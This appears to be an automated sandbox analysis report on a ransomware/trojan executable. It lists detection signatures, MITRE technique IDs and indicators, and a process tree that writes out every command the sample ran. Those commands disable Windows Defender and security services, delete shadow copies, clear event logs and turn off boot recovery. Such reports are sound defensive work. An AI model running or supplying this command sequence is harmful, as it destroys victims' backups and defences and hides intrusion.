c545b9e34fe2f9aea3d0ff14512f0b0089a835f37ae3de49a81e49a2d8cecce8

Resubmissions

31-01-2022 12:20

220131-ph549ahga6 10

31-01-2022 12:00

220131-n6sndshahl 10

Analysis

max time kernel
11s
max time network
9s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
31-01-2022 12:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
Size

4.2MB
MD5

4685e7981959356439fe0f5643d45450
SHA1

88b7ef25b17528a464758aafa9e853477e391491
SHA256

06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8
SHA512

8aefb153e913544d1e83b98cc964f266e537bd962c44dc2142f33a4ddf356230bc2b10d713fa84c77a33a2a8003cf1ab143f44dee227d7832f5cbd516f94b56f

Score

10^/10

evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1420	bcdedit.exe
628	bcdedit.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3604	vssadmin.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2436	svchost.exe
Token: SeCreatePagefilePrivilege	2436	svchost.exe
Token: SeShutdownPrivilege	2436	svchost.exe
Token: SeCreatePagefilePrivilege	2436	svchost.exe
Token: SeShutdownPrivilege	2436	svchost.exe
Token: SeCreatePagefilePrivilege	2436	svchost.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	4700	wevtutil.exe
Token: SeBackupPrivilege	4700	wevtutil.exe
Token: SeSecurityPrivilege	1432	wevtutil.exe
Token: SeBackupPrivilege	1432	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	4820	wmic.exe
Token: SeSecurityPrivilege	4820	wmic.exe
Token: SeTakeOwnershipPrivilege	4820	wmic.exe
Token: SeLoadDriverPrivilege	4820	wmic.exe
Token: SeSystemProfilePrivilege	4820	wmic.exe
Token: SeSystemtimePrivilege	4820	wmic.exe
Token: SeProfSingleProcessPrivilege	4820	wmic.exe
Token: SeIncBasePriorityPrivilege	4820	wmic.exe
Token: SeCreatePagefilePrivilege	4820	wmic.exe
Token: SeBackupPrivilege	4820	wmic.exe
Token: SeRestorePrivilege	4820	wmic.exe
Token: SeShutdownPrivilege	4820	wmic.exe
Token: SeDebugPrivilege	4820	wmic.exe
Token: SeSystemEnvironmentPrivilege	4820	wmic.exe
Token: SeRemoteShutdownPrivilege	4820	wmic.exe
Token: SeUndockPrivilege	4820	wmic.exe
Token: SeManageVolumePrivilege	4820	wmic.exe
Token: 33	4820	wmic.exe
Token: 34	4820	wmic.exe
Token: 35	4820	wmic.exe
Token: 36	4820	wmic.exe
Token: SeIncreaseQuotaPrivilege	1544	wmic.exe
Token: SeSecurityPrivilege	1544	wmic.exe
Token: SeTakeOwnershipPrivilege	1544	wmic.exe
Token: SeLoadDriverPrivilege	1544	wmic.exe
Token: SeSystemProfilePrivilege	1544	wmic.exe
Token: SeSystemtimePrivilege	1544	wmic.exe
Token: SeProfSingleProcessPrivilege	1544	wmic.exe
Token: SeIncBasePriorityPrivilege	1544	wmic.exe
Token: SeCreatePagefilePrivilege	1544	wmic.exe
Token: SeBackupPrivilege	1544	wmic.exe
Token: SeRestorePrivilege	1544	wmic.exe
Token: SeShutdownPrivilege	1544	wmic.exe
Token: SeDebugPrivilege	1544	wmic.exe
Token: SeSystemEnvironmentPrivilege	1544	wmic.exe
Token: SeRemoteShutdownPrivilege	1544	wmic.exe
Token: SeUndockPrivilege	1544	wmic.exe
Token: SeManageVolumePrivilege	1544	wmic.exe
Token: 33	1544	wmic.exe
Token: 34	1544	wmic.exe
Token: 35	1544	wmic.exe
Token: 36	1544	wmic.exe
Token: SeIncreaseQuotaPrivilege	1544	wmic.exe
Token: SeSecurityPrivilege	1544	wmic.exe
Token: SeTakeOwnershipPrivilege	1544	wmic.exe
Token: SeLoadDriverPrivilege	1544	wmic.exe
Token: SeSystemProfilePrivilege	1544	wmic.exe
Token: SeSystemtimePrivilege	1544	wmic.exe
Token: SeProfSingleProcessPrivilege	1544	wmic.exe
Token: SeIncBasePriorityPrivilege	1544	wmic.exe
Token: SeCreatePagefilePrivilege	1544	wmic.exe
Token: SeBackupPrivilege	1544	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1260 wrote to memory of 1248	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	87
PID 1260 wrote to memory of 1248	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	87
PID 1248 wrote to memory of 4700	1248	net.exe	89
PID 1248 wrote to memory of 4700	1248	net.exe	89
PID 1260 wrote to memory of 444	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	90
PID 1260 wrote to memory of 444	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	90
PID 444 wrote to memory of 1276	444	net.exe	92
PID 444 wrote to memory of 1276	444	net.exe	92
PID 1260 wrote to memory of 2716	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	93
PID 1260 wrote to memory of 2716	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	93
PID 2716 wrote to memory of 4852	2716	net.exe	95
PID 2716 wrote to memory of 4852	2716	net.exe	95
PID 1260 wrote to memory of 5112	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	96
PID 1260 wrote to memory of 5112	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	96
PID 5112 wrote to memory of 4904	5112	net.exe	98
PID 5112 wrote to memory of 4904	5112	net.exe	98
PID 1260 wrote to memory of 2704	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	99
PID 1260 wrote to memory of 2704	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	99
PID 2704 wrote to memory of 3380	2704	net.exe	101
PID 2704 wrote to memory of 3380	2704	net.exe	101
PID 1260 wrote to memory of 3528	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	102
PID 1260 wrote to memory of 3528	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	102
PID 3528 wrote to memory of 628	3528	net.exe	104
PID 3528 wrote to memory of 628	3528	net.exe	104
PID 1260 wrote to memory of 4288	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	105
PID 1260 wrote to memory of 4288	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	105
PID 4288 wrote to memory of 4556	4288	net.exe	107
PID 4288 wrote to memory of 4556	4288	net.exe	107
PID 1260 wrote to memory of 3016	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	108
PID 1260 wrote to memory of 3016	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	108
PID 3016 wrote to memory of 4056	3016	net.exe	110
PID 3016 wrote to memory of 4056	3016	net.exe	110
PID 1260 wrote to memory of 5060	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	111
PID 1260 wrote to memory of 5060	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	111
PID 1260 wrote to memory of 3068	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	113
PID 1260 wrote to memory of 3068	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	113
PID 1260 wrote to memory of 1712	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	115
PID 1260 wrote to memory of 1712	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	115
PID 1260 wrote to memory of 1328	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	117
PID 1260 wrote to memory of 1328	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	117
PID 1260 wrote to memory of 1832	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	119
PID 1260 wrote to memory of 1832	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	119
PID 1260 wrote to memory of 860	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	121
PID 1260 wrote to memory of 860	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	121
PID 1260 wrote to memory of 440	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	123
PID 1260 wrote to memory of 440	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	123
PID 1260 wrote to memory of 4980	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	125
PID 1260 wrote to memory of 4980	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	125
PID 1260 wrote to memory of 3272	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	127
PID 1260 wrote to memory of 3272	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	127
PID 1260 wrote to memory of 4124	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	129
PID 1260 wrote to memory of 4124	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	129
PID 1260 wrote to memory of 4268	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	131
PID 1260 wrote to memory of 4268	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	131
PID 1260 wrote to memory of 504	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	133
PID 1260 wrote to memory of 504	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	133
PID 1260 wrote to memory of 4012	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	135
PID 1260 wrote to memory of 4012	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	135
PID 1260 wrote to memory of 1648	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	138
PID 1260 wrote to memory of 1648	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	138
PID 1260 wrote to memory of 5016	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	140
PID 1260 wrote to memory of 5016	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	140
PID 1260 wrote to memory of 4328	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	142
PID 1260 wrote to memory of 4328	1260	06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe	142

C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
"C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1260
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:4700
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:1276
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:4852
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:4904
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:3380
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:628
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_16b91" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_16b91" /y
    3⤵
    PID:4056
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  PID:5060
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  PID:3068
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  PID:1712
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  PID:1328
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  PID:1832
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  PID:860
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  PID:440
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_16b91" start= disabled
  2⤵
  PID:4980
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3272
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:4124
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4268
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:504
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:4012
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1648
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:5016
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4328
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4492
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:3840
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:3104
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:1572
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1996
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1184
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:4048
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:3380
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:632
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:1984
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1836
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:3564
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:2244
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:256
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:4600
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:4896
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1508
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2312
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:3312
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3108
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2960
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4088
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4000
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:4884
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4672
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3604
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4820
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1420
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:3188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:3792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:224

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 2b897f4176e0972ee77af72d0bec46f5 X18VADYF3EirDh9ErzgbEQ.0.1.0.0.0
1⤵
- Modifies data under HKEY_USERS
PID:1608

